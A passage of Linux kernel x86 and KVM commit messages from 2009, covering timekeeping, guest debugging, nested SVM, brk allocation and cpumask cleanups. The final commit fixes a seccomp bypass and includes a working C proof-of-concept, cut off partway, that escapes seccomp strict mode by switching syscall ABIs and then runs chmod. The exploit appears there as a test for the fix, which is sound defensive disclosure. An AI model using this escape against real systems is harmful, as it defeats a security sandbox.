Partial revert of commit 129d8bc828
titled 'x86: don't compile vsmp_64 for 32bit'
Commit reverted to compile vsmp_64.c if CONFIG_X86_64 is defined,
since is_vsmp_box() needs to indicate that TSCs are not synchronized, and
hence, not a valid time source, even when CONFIG_X86_VSMP is not defined.
Signed-off-by: Ravikiran Thirumalai <kiran@scalex86.org>
Cc: Yinghai Lu <yinghai@kernel.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: shai@scalex86.org
LKML-Reference: <20090324061429.GH7278@localdomain>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
IRQ injection status is either -1 (if there was no CPU found
that should except the interrupt because IRQ was masked or
ioapic was misconfigured or ...) or >= 0 in that case the
number indicates to how many CPUs interrupt was injected.
If the value is 0 it means that the interrupt was coalesced
and probably should be reinjected.
Signed-off-by: Gleb Natapov <gleb@redhat.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
AMD k10 includes support for the FFXSR feature, which leaves out
XMM registers on FXSAVE/FXSAVE when the EFER_FFXSR bit is set in
EFER.
The CPUID feature bit exists already, but the EFER bit is missing
currently, so this patch adds it to the list of known EFER bits.
Signed-off-by: Alexander Graf <agraf@suse.de>
CC: Joerg Roedel <joerg.roedel@amd.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
Kconfig symbols are not available in userspace, and are not stripped by
headers-install. Avoid their use by adding #defines in <asm/kvm.h> to
suit each architecture.
Signed-off-by: Avi Kivity <avi@redhat.com>
This actually describes what is going on, rather than alerting the reader
that something strange is going on.
Signed-off-by: Avi Kivity <avi@redhat.com>
Certain clocks (such as TSC) in older 2.6 guests overaccount for lost
ticks, causing severe time drift. Interrupt reinjection magnifies the
problem.
Provide an option to disable it.
[avi: allow room for expansion in case we want to disable reinjection
of other timers]
Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
This commit change the name of emulator_read_std into kvm_read_guest_virt,
and add new function name kvm_write_guest_virt that allow writing into a
guest virtual address.
Signed-off-by: Izik Eidus <ieidus@redhat.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
VMX initializes the TSC offset for each vcpu at different times, and
also reinitializes it for vcpus other than 0 on APIC SIPI message.
This bug causes the TSC's to appear unsynchronized in the guest, even if
the host is good.
Older Linux kernels don't handle the situation very well, so
gettimeofday is likely to go backwards in time:
http://www.mail-archive.com/kvm@vger.kernel.org/msg02955.htmlhttp://sourceforge.net/tracker/index.php?func=detail&aid=2025534&group_id=180599&atid=893831
Fix it by initializating the offset of each vcpu relative to vm creation
time, and moving it from vmx_vcpu_reset to vmx_vcpu_setup, out of the
APIC MP init path.
Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
Don't allow a vcpu with cr4.pge cleared to use a shadow page created with
cr4.pge set; this might cause a cr3 switch not to sync ptes that have the
global bit set (the global bit has no effect if !cr4.pge).
This can only occur on smp with different cr4.pge settings for different
vcpus (since a cr4 change will resync the shadow ptes), but there's no
cost to being correct here.
Signed-off-by: Avi Kivity <avi@redhat.com>
Instead of "calculating" it on every shadow page allocation, set it once
when switching modes, and copy it when allocating pages.
This doesn't buy us much, but sets up the stage for inheriting more
information related to the mmu setup.
Signed-off-by: Avi Kivity <avi@redhat.com>
So far KVM only had basic x86 debug register support, once introduced to
realize guest debugging that way. The guest itself was not able to use
those registers.
This patch now adds (almost) full support for guest self-debugging via
hardware registers. It refactors the code, moving generic parts out of
SVM (VMX was already cleaned up by the KVM_SET_GUEST_DEBUG patches), and
it ensures that the registers are properly switched between host and
guest.
This patch also prepares debug register usage by the host. The latter
will (once wired-up by the following patch) allow for hardware
breakpoints/watchpoints in guest code. If this is enabled, the guest
will only see faked debug registers without functionality, but with
content reflecting the guest's modifications.
Tested on Intel only, but SVM /should/ work as well, but who knows...
Known limitations: Trapping on tss switch won't work - most probably on
Intel.
Credits also go to Joerg Roedel - I used his once posted debugging
series as platform for this patch.
Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
This rips out the support for KVM_DEBUG_GUEST and introduces a new IOCTL
instead: KVM_SET_GUEST_DEBUG. The IOCTL payload consists of a generic
part, controlling the "main switch" and the single-step feature. The
arch specific part adds an x86 interface for intercepting both types of
debug exceptions separately and re-injecting them when the host was not
interested. Moveover, the foundation for guest debugging via debug
registers is layed.
To signal breakpoint events properly back to userland, an arch-specific
data block is now returned along KVM_EXIT_DEBUG. For x86, the arch block
contains the PC, the debug exception, and relevant debug registers to
tell debug events properly apart.
The availability of this new interface is signaled by
KVM_CAP_SET_GUEST_DEBUG. Empty stubs for not yet supported archs are
provided.
Note that both SVM and VTX are supported, but only the latter was tested
yet. Based on the experience with all those VTX corner case, I would be
fairly surprised if SVM will work out of the box.
Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
VMX differentiates between processor and software generated exceptions
when injecting them into the guest. Extend vmx_queue_exception
accordingly (and refactor related constants) so that we can use this
service reliably for the new guest debugging framework.
Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com>
Signed-off-by: Avi Kivity <avi@redhat.com>
This patch implements VMRUN. VMRUN enters a virtual CPU and runs that
in the same context as the normal guest CPU would run.
So basically it is implemented the same way, a normal CPU would do it.
We also prepare all intercepts that get OR'ed with the original
intercepts, as we do not allow a level 2 guest to be intercepted less
than the first level guest.
v2 implements the following improvements:
- fixes the CPL check
- does not allocate iopm when not used
- remembers the host's IF in the HIF bit in the hflags
v3:
- make use of the new permission checking
- add support for V_INTR_MASKING_MASK
v4:
- use host page backed hsave
v5:
- remove IOPM merging code
v6:
- save cr4 so PAE l1 guests work
v7:
- return 0 on vmrun so we check the MSRs too
- fix MSR check to use the correct variable
Acked-by: Joerg Roedel <joro@8bytes.org>
Signed-off-by: Alexander Graf <agraf@suse.de>
Signed-off-by: Avi Kivity <avi@redhat.com>
This patch implements the GIF flag and the clgi and stgi instructions that
set this flag. Only if the flag is set (default), interrupts can be received by
the CPU.
To keep the information about that somewhere, this patch adds a new hidden
flags vector. that is used to store information that does not go into the
vmcb, but is SVM specific.
I tried to write some code to make -no-kvm-irqchip work too, but the first
level guest won't even boot with that atm, so I ditched it.
v2 moves the hflags to x86 generic code
v3 makes use of the new permission helper
v6 only enables interrupt_window if GIF=1
Acked-by: Joerg Roedel <joro@8bytes.org>
Signed-off-by: Alexander Graf <agraf@suse.de>
Signed-off-by: Avi Kivity <avi@redhat.com>
MSR_EFER_SVME_MASK, MSR_VM_CR and MSR_VM_HSAVE_PA are set in KVM
specific headers. Linux does have nice header files to collect
EFER bits and MSR IDs, so IMHO we should put them there.
While at it, I also changed the naming scheme to match that
of the other defines.
(introduced in v6)
Acked-by: Joerg Roedel <joro@8bytes.org>
Signed-off-by: Alexander Graf <agraf@suse.de>
Signed-off-by: Avi Kivity <avi@redhat.com>
Impact: section mismatch fix
Ingo reports these warnings:
> WARNING: vmlinux.o(.text+0x6a288e): Section mismatch in reference from
> the function dmi_alloc() to the function .init.text:extend_brk()
> The function dmi_alloc() references
> the function __init extend_brk().
> This is often because dmi_alloc lacks a __init annotation or the
> annotation of extend_brk is wrong.
dmi_alloc() is a static inline, and so should be immune to this
kind of error. But force it to be inlined and make it __init
anyway, just to be extra sure.
All of dmi_alloc()'s callers are already __init.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Cc: Yinghai Lu <yinghai@kernel.org>
LKML-Reference: <49C6B23C.2040308@goop.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
This fixed various signedness issues in setup.c and e820.c:
arch/x86/kernel/setup.c:455:53: warning: incorrect type in argument 3 (different signedness)
arch/x86/kernel/setup.c:455:53: expected int *pnr_map
arch/x86/kernel/setup.c:455:53: got unsigned int extern [toplevel] *<noident>
arch/x86/kernel/setup.c:639:53: warning: incorrect type in argument 3 (different signedness)
arch/x86/kernel/setup.c:639:53: expected int *pnr_map
arch/x86/kernel/setup.c:639:53: got unsigned int extern [toplevel] *<noident>
arch/x86/kernel/setup.c:820:54: warning: incorrect type in argument 3 (different signedness)
arch/x86/kernel/setup.c:820:54: expected int *pnr_map
arch/x86/kernel/setup.c:820:54: got unsigned int extern [toplevel] *<noident>
arch/x86/kernel/e820.c:670:53: warning: incorrect type in argument 3 (different signedness)
arch/x86/kernel/e820.c:670:53: expected int *pnr_map
arch/x86/kernel/e820.c:670:53: got unsigned int [toplevel] *<noident>
Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
Add new interfaces:
set_pages_array_uc()
set_pages_array_wb()
that can be used change the page attribute for a bunch of pages with
flush etc done once at the end of all the changes. These interfaces
are similar to existing set_memory_array_uc() and set_memory_array_wc().
Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Cc: arjan@infradead.org
Cc: eric@anholt.net
Cc: airlied@redhat.com
LKML-Reference: <20090319215358.901545000@intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Weak functions aren't all they're cracked up to be. They lead to
incorrect binaries with some toolchains, they require us to have empty
functions we otherwise wouldn't, and the unused code is not elided
(as of gcc 4.3.2 anyway).
So replace the weak MSI arch hooks with the #define foo foo idiom. We no
longer need empty versions of arch_setup/teardown_msi_irq().
This is less source (by 1 line!), and results in smaller binaries too:
text data bss dec hex filename
9354300 1693916 678424 11726640 b2ef30 build/powerpc/vmlinux-before
9354052 1693852 678424 11726328 b2edf8 build/powerpc/vmlinux-after
Also smaller on x86_64 and arm (iop13xx).
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org>
Impact: Fix cpu offline when CONFIG_MAXSMP=y
Changeset bc9b83dd1f "cpumask: convert
c1e_mask in arch/x86/kernel/process.c to cpumask_var_t" contained a
bug: c1e_mask is manipulated even if C1E isn't detected (and hence
not allocated).
This is simply fixed by checking for NULL (which gcc optimizes out
anyway of CONFIG_CPUMASK_OFFSTACK=n, since it knows ce1_mask can never
be NULL).
In addition, fix a leak where select_idle_routine re-allocates
(and re-clears) c1e_mask on every cpu init.
Reported-by: Ingo Molnar <mingo@elte.hu>
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Cc: Mike Travis <travis@sgi.com>
LKML-Reference: <200903171450.34549.rusty@rustcorp.com.au>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: optimize APIC IPI related barriers
Uncached MMIO accesses for xapic are inherently serializing and hence
we don't need explicit barriers for xapic IPI paths.
x2apic MSR writes/reads don't have serializing semantics and hence need
a serializing instruction or mfence, to make all the previous memory
stores globally visisble before the x2apic msr write for IPI.
Add x2apic_wrmsr_fence() in flush tlb path to x2apic specific paths.
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: Jens Axboe <jens.axboe@oracle.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
Cc: Rusty Russell <rusty@rustcorp.com.au>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: "steiner@sgi.com" <steiner@sgi.com>
Cc: Nick Piggin <npiggin@suse.de>
LKML-Reference: <1237313814.27006.203.camel@localhost.localdomain>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: fix possible race
save_mask_IO_APIC_setup() was using non atomic memory allocation while getting
called with interrupts disabled. Fix this by splitting this into two different
function. Allocation part save_IO_APIC_setup() now happens before
disabling interrupts.
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Impact: simplification
In the current code, for level triggered migration, we need to modify the
io-apic RTE with the update vector information, along with modifying interrupt
remapping table entry(IRTE) with vector and destination. This is to ensure that
remote IRR bit inthe IOAPIC RTE gets cleared when the cpu does EOI.
With this patch, for level triggered, we eliminate the io-apic RTE modification
(with the updated vector information), by using a virtual vector (io-apic pin
number). Real vector that is used for interrupting cpu will be coming from
the interrupt-remapping table entry. Trigger mode in the IRTE will always be
edge, and the actual level or edge trigger will be setup in the IO-APIC RTE.
So a level triggered interrupt will appear as an edge to the local apic
cpu but still as level to the IO-APIC.
With this change, level irq migration can be done by simply modifying
the interrupt-remapping table entry with out changing the io-apic RTE.
And as the interrupt appears as edge at the cpu, in addition to do the
local apic EOI, we need to do IO-APIC directed EOI to clear the remote
IRR bit in the IO-APIC RTE.
This simplies the irq migration in the presence of interrupt-remapping.
Idea-by: Rajesh Sankaran <rajesh.sankaran@intel.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Impact: cleanup, paranoia
We were not clearing the local APIC in clear_local_APIC() in the
presence of x2apic. Fix it.
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Impact: interface augmentation (not yet used)
Enable fault handling flow for intr-remapping aswell. Fault handling
code now shared by both dma-remapping and intr-remapping.
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Impact: bulletproofing, clarification
The brk reservation symbols are just there to document the amount
of space reserved by brk users in the final vmlinux file. Their
addresses are irrelevent, and using their addresses will cause
certain havok. Name them ".brk.NAME", which is a valid asm symbol
but C can't reference it; it also highlights their special
role in the symbol table.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Impact: fix crash on VMI (VMware)
When we generate a call sequence for calling a paravirtualized
function, we presume that the generated code is "call *0xXXXXX",
which is a 6 byte opcode; this is larger than a normal
direct call, and so we can patch a direct call over it.
At the moment, however we give gcc enough rope to hang us by
putting the address in a register and generating a two byte
indirect-via-register call. Prevent this by explicitly
dereferencing the function pointer and passing it into the
asm as a constant.
This prevents crashes in VMI, as it cannot handle unpatchable
callsites.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Cc: Alok Kataria <akataria@vmware.com>
LKML-Reference: <49BEEDC2.2070809@goop.org>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: new interface; remove hard-coded limit
Add RESERVE_BRK(name, size) macro to reserve space in the brk
area. This should be a conservative (ie, larger) estimate of
how much space might possibly be required from the brk area.
Any unused space will be freed, so there's no real downside
on making the reservation too large (within limits).
The name should be unique within a given file, and somewhat
descriptive.
The C definition of RESERVE_BRK() ends up being more complex than
one would expect to work around a cluster of gcc infelicities:
The first attempt was to simply try putting __section(.brk_reservation)
on a variable. This doesn't work because it ends up making it a
@progbits section, which gets actual space allocated in the vmlinux
executable.
The second attempt was to emit the space into a section using asm,
but gcc doesn't allow arguments to be passed to file-level asm()
statements, making it hard to pass in the size.
The final attempt is to wrap the asm() in a function to allow
it to have arguments, and put the function itself into the
.discard section, which vmlinux*.lds drops entirely from the
emitted vmlinux.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: simplification
We only need to map the kernel in head_32.S, not the whole of
lowmem. We use 512MB as a reasonable (but arbitrary) limit on
the maximum size of the kernel image.
Signed-off-by: Yinghai Lu <yinghai@kernel.org>
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: use new interface instead of previous ad hoc implementation
Use extend_brk() to allocate memory for DMI rather than having an
ad-hoc allocator.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: use new interface instead of previous ad hoc implementation
Rather than having special purpose init_pg_table_start/end variables
to delimit the kernel pagetable built by head_32.S, just use the brk
mechanism to extend the bss for the new pagetable.
This patch removes init_pg_table_start/end and pg0, defines __brk_base
(which is page-aligned and immediately follows _end), initializes
the brk region to start there, and uses it for the 32-bit pagetable.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Impact: new interface
Add a brk()-like allocator which effectively extends the bss in order
to allow very early code to do dynamic allocations. This is better than
using statically allocated arrays for data in subsystems which may never
get used.
The space for brk allocations is in the bss ELF segment, so that the
space is mapped properly by the code which maps the kernel, and so
that bootloaders keep the space free rather than putting a ramdisk or
something into it.
The bss itself, delimited by __bss_stop, ends before the brk area
(__brk_base to __brk_limit). The kernel text, data and bss is reserved
up to __bss_stop.
Any brk-allocated data is reserved separately just before the kernel
pagetable is built, as that code allocates from unreserved spaces
in the e820 map, potentially allocating from any unused brk memory.
Ultimately any unused memory in the brk area is used in the general
kernel memory pool.
Initially the brk space is set to 1MB, which is probably much larger
than any user needs (the largest current user is i386 head_32.S's code
to build the pagetables to map the kernel, which can get fairly large
with a big kernel image and no PSE support). So long as the system
has sufficient memory for the bootloader to reserve the kernel+1MB brk,
there are no bad effects resulting from an over-large brk.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Provide the x86 trace callbacks to trace syscalls.
Signed-off-by: Frederic Weisbecker <fweisbec@gmail.com>
Acked-by: Steven Rostedt <rostedt@goodmis.org>
Cc: Lai Jiangshan <laijs@cn.fujitsu.com>
LKML-Reference: <1236401580-5758-3-git-send-email-fweisbec@gmail.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
We are removing cpumask_t in favour of struct cpumask: mainly as a
marker of what code is now CONFIG_CPUMASK_OFFSTACK-safe.
The only non-trivial change here is vector_allocation_domain():
explicitly clear the mask and set the first word, rather than using
assignment.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Impact: reduce kernel memory usage when CONFIG_CPUMASK_OFFSTACK=y
Straightforward conversion: done for 32 and 64 bit kernels.
node_to_cpumask_map is now a cpumask_var_t array.
64-bit used to be a dynamic cpumask_t array, and 32-bit used to be a
static cpumask_t array.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Impact: cleanup
We take the 64-bit code and use it on 32-bit as well. The new file
is called mm/numa.c.
In a minor cleanup, we use cpu_none_mask instead of declaring a local
cpu_mask_none.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Impact: implement new API
We define arch_send_call_function_ipi_mask and generic kernel/smp.c
code creates arch_send_call_function_ipi() as a wrapper.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Impact: reduce per-cpu size for CONFIG_CPUMASK_OFFSTACK=y
In most places it's cleaner to use the accessors cpu_sibling_mask()
and cpu_core_mask() wrappers which already exist.
I couldn't avoid cleaning up the access in oprofile, either.
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Impact: 32/64-bit consolidation
In a first step, this allows fixing phys_addr_valid() for PAE (which
until now reported all addresses to be valid). Subsequently, this will
also allow simplifying some MTRR handling code.
Signed-off-by: Jan Beulich <jbeulich@novell.com>
LKML-Reference: <49B9101E.76E4.0078.0@novell.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: fix potential oops during app-initiated LDT manipulation
The underlying hypercall has differing argument requirements on 32-
and 64-bit.
Signed-off-by: Jan Beulich <jbeulich@novell.com>
Acked-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
LKML-Reference: <49B9061E.76E4.0078.0@novell.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: obsolete feature removal
The zImage kernel format has been functionally unused for a very long
time. It is just barely possible to build a modern kernel that still
fits within the zImage size limit, but it is highly unlikely that
anyone ever uses it. Furthermore, although it is still supported by
most bootloaders, it has been at best poorly tested (or not tested at
all); some bootloaders are even known to not support zImage at all and
not having even noticed.
Also remove some really obsolete constants that no longer have any
meaning.
LKML-Reference: <49B703D4.1000008@zytor.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
kmap_atomic_pfn() and iomap_atomic_prot_pfn() are almost same
except pgprot. This patch removes the code duplication for these
two functions.
Signed-off-by: Akinobu Mita <akinobu.mita@gmail.com>
LKML-Reference: <20090311143317.GA22244@localhost.localdomain>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
move store_ldt outside the CONFIG_PARAVIRT section and
also clean up the code a bit.
Signed-off-by: Jaswinder Singh Rajput <jaswinder@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
1) .p2align 4 and .align 16 are the same meaning
(until a.out format for i386 is used which is
not our case for CONFIG_X86_ALIGNMENT_16 anyway)
2) having 15 as max allowed bytes to be skipped
does not make sense on modulo 16
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
LKML-Reference: <20090309171951.GE9945@localhost>
[ small cleanup, use __stringify(), etc. ]
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: New major feature
This patch add kexec jump support for x86_64. More information about
kexec jump can be found in corresponding x86_32 support patch.
Signed-off-by: Huang Ying <ying.huang@intel.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
Introduce:
cat /sys/kernel/debug/x86/cpu/*
for Intel and AMD processors to view / debug the state of each CPU.
By using this we can debug whole range of registers and other
cpu information for debugging purpose and monitor how things
are changing.
This can be useful for developers as well as for users.
Signed-off-by: Jaswinder Singh Rajput <jaswinderrajput@gmail.com>
LKML-Reference: <1236701373.3387.4.camel@localhost.localdomain>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: generic addr <-> pcpu ptr conversion macros
There's nothing arch specific about x86 __addr_to_pcpu_ptr() and
__pcpu_ptr_to_addr(). With proper __per_cpu_load and __per_cpu_start
defined, they'll do the right thing regardless of actual layout.
Move these macros from arch/x86/include/asm/percpu.h to mm/percpu.c
and allow archs to override it as necessary.
Signed-off-by: Tejun Heo <tj@kernel.org>
Stephen Rothwell reported:
|Today's linux-next build (x86_64 allmodconfig) produced this warning:
|
|In file included from drivers/char/epca.c:49:
|drivers/char/digiFep1.h:7:1: warning: "GLOBAL" redefined
|In file included from include/linux/linkage.h:5,
| from include/linux/kernel.h:11,
| from arch/x86/include/asm/system.h:10,
| from arch/x86/include/asm/processor.h:17,
| from include/linux/prefetch.h:14,
| from include/linux/list.h:6,
| from include/linux/module.h:9,
| from drivers/char/epca.c:29:
|arch/x86/include/asm/linkage.h:55:1: warning: this is the location of the previous definition
|
|Probably introduced by commit 95695547a7
|("x86: asm linkage - introduce GLOBAL macro") from the x86 tree.
Any assembler specific snippets being placed in headers
are to be protected by __ASSEMBLY__. Fixed.
Also move __ALIGN definition under the same protection as well.
Reported-by: Stephen Rothwell <sfr@canb.auug.org.au>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
LKML-Reference: <20090306160833.GB7420@localhost>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Use fixmaps instead of vmap/vunmap in text_poke() for avoiding
page allocation and delayed unmapping.
At the result of above change, text_poke() becomes atomic and can be called
from stop_machine() etc.
Signed-off-by: Masami Hiramatsu <mhiramat@redhat.com>
Acked-by: Mathieu Desnoyers <mathieu.desnoyers@polymtl.ca>
LKML-Reference: <49B14352.2040705@redhat.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Rather than relying on the ever-unreliable system_state,
add a specific __vmalloc_start_set flag to indicate whether
the vmalloc area has meaningful boundaries yet, and use that
in x86-32's __phys_addr and __virt_addr_valid.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
gcc 3.2.2 reports:
In file included from /usr/src/all/linux-next/arch/x86/include/asm/page.h:8,
from /usr/src/all/linux-next/arch/x86/include/asm/processor.h:18,
from /usr/src/all/linux-next/arch/x86/include/asm/atomic_32.h:6,
from /usr/src/all/linux-next/arch/x86/include/asm/atomic.h:2,
from include/linux/crypto.h:20,
from arch/x86/kernel/asm-offsets_32.c:7,
from arch/x86/kernel/asm-offsets.c:2:
/usr/src/all/linux-next/arch/x86/include/asm/page_types.h:54: warning: parameter has incomplete type
/usr/src/all/linux-next/arch/x86/include/asm/page_types.h:56: warning: parameter has incomplete type
In file included from /usr/src/all/linux-next/arch/x86/include/asm/page.h:8,
from /usr/src/all/linux-next/arch/x86/include/asm/processor.h:18,
from include/linux/prefetch.h:14,
from include/linux/list.h:6,
from include/linux/module.h:9,
from init/main.c:13:
/usr/src/all/linux-next/arch/x86/include/asm/page_types.h:54: warning: parameter has incomplete type
/usr/src/all/linux-next/arch/x86/include/asm/page_types.h:56: warning: parameter has incomplete type
This is a bogus warning, but moving the pat-related functions
into asm/pat.h and including asm/pgtable_types.h should fix it.
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Reported-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: fix math-emu related crash while using GDB/ptrace
init_fpu() calls finit to initialize a task's xstate, while finit always
works on the current task. If we use PTRACE_GETFPREGS on another
process and both processes did not already use floating point, we get
a null pointer exception in finit.
This patch creates a new function finit_task that takes a task_struct
parameter. finit becomes a wrapper that simply calls finit_task with
current. On the plus side this avoids many calls to get_current which
would each resolve to an inline assembler mov instruction.
An empty finit_task has been added to i387.h to avoid linker errors in
case the compiler still emits the call in init_fpu when
CONFIG_MATH_EMULATION is not defined.
The declaration of finit in i387.h has been removed as the remaining
code using this function gets its prototype from fpu_proto.h.
Signed-off-by: Daniel Glöckner <dg@emlix.com>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Pallipadi Venkatesh" <venkatesh.pallipadi@intel.com>
Cc: Arjan van de Ven <arjan@infradead.org>
Cc: Bill Metzenthen <billm@melbpc.org.au>
LKML-Reference: <E1Lew31-0004il-Fg@mailer.emlix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Add macro to loop through each possible blade.
Signed-off-by: Dimitri Sivanich <sivanich@sgi.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: john stultz <johnstul@us.ibm.com>
LKML-Reference: <20090304185719.GB24419@sgi.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
This patch allocates a system interrupt vector for various platform
specific uses.
Signed-off-by: Dimitri Sivanich <sivanich@sgi.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: john stultz <johnstul@us.ibm.com>
LKML-Reference: <20090304185605.GA24419@sgi.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: Fix boot failure on EFI system with large runtime memory range
Brian Maly reported that some EFI system with large runtime memory
range can not boot. Because the FIX_MAP used to map runtime memory
range is smaller than run time memory range.
This patch fixes this issue by re-implement efi_ioremap() with
init_memory_mapping().
Reported-and-tested-by: Brian Maly <bmaly@redhat.com>
Signed-off-by: Huang Ying <ying.huang@intel.com>
Cc: Brian Maly <bmaly@redhat.com>
Cc: Yinghai Lu <yinghai@kernel.org>
LKML-Reference: <1236135513.6204.306.camel@yhuang-dev.sh.intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
The function seems to have disappeared at some point, leaving
some vestigial prototypes behind...
Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c.
The declaration of the function is kept in asm/numa_32.h because
asm/highmem.h is included only if CONFIG_HIGHMEM is enabled so we
can't put the empty static inline function there.
Signed-off-by: Pekka Enberg <penberg@cs.helsinki.fi>
LKML-Reference: <1236082212.2675.24.camel@penberg-laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
